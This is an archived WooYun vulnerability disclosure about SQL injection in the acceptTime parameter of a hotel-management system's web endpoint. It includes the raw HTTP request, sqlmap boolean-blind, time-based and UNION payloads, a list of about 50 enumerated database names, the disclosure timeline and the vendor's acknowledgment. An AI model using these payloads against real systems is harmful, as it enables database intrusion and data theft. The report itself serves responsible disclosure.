乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-23: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经确认,细节仅向厂商公开 2016-01-04: 细节向核心白帽子及相关领域专家公开 2016-01-14: 细节向普通白帽子公开 2016-01-24: 细节向实习白帽子公开 2016-02-08: 细节向公众公开
2333
POST /dibeicrs/internalMsgInfoList.html HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 151Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://cbs.zhuzher.com:15018/Cookie: JSESSIONID=6A29C439CA0C6C84F19600D5D092E779; JSESSIONID=6A29C439CA0C6C84F19600D5D092E779; key=yourkey; guid=206e-314c-c081-f57bHost: cbs.zhuzher.com:15018Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*acceptTime=4111111111111111*&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0
参数 acceptTime 可注入
DBA权限
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ysqlmap identified the following injection point(s) with a total of 247 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: acceptTime=-7427') OR 4822=4822 AND ('ioer'='ioer&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: acceptTime=4111111111111111') AND (SELECT * FROM (SELECT(SLEEP(5)))oHmr) AND ('LLSQ'='LLSQ&button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0 Type: UNION query Title: Generic UNION query (random number) - 8 columns Payload: acceptTime=4111111111111111') UNION ALL SELECT 4627,CONCAT(0x716a6b7071,0x72414e69426479574a4c,0x71706a6b71),4627,4627,4627,4627,4627,4627-- &button=%e6%90%9c%e7%b4%a2&content=-1&msgtype=0&page=1&sendTime=1&status=0---[18:01:35] [INFO] the back-end DBMS is MySQLweb application technology: JSPback-end DBMS: MySQL 5.0.12[18:01:35] [INFO] fetching database namesavailable databases [50]:[*] baitiane[*] baiyuan[*] baolongjujia[*] cbs20121022[*] chenguang[*] demo703[*] dibei[*] dongxiangting[*] eken[*] futai118[*] fuyi[*] geziwei[*] haizhilian[*] hanmu[*] hanshe[*] haorujia[*] heyi[*] hongzhen[*] hongzhenpms[*] hualv[*] huilai[*] hutongyin[*] ims[*] information_schema[*] jiayuan[*] jingtong[*] jintaizhijia[*] jitai[*] kaibin[*] mini[*] mysql[*] nixi[*] nuoting[*] nuotingnew[*] qibai[*] renhe[*] sanyuan[*] shishang[*] tanggongguan[*] test[*] test_cbs[*] vbs[*] wuyishan[*] xicheng[*] xijinshuyuan[*] yibai[*] yidafengshang[*] yinju[*] yuanyang[*] yueyou[18:01:37] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\cbs.zhuzher.com'[*] shutting down at 18:01:37
危害等级:中
漏洞Rank:5
确认时间:2015-12-25 20:24
感谢白帽子对住哲的关注,我们尽快对此问题进行修复。
暂无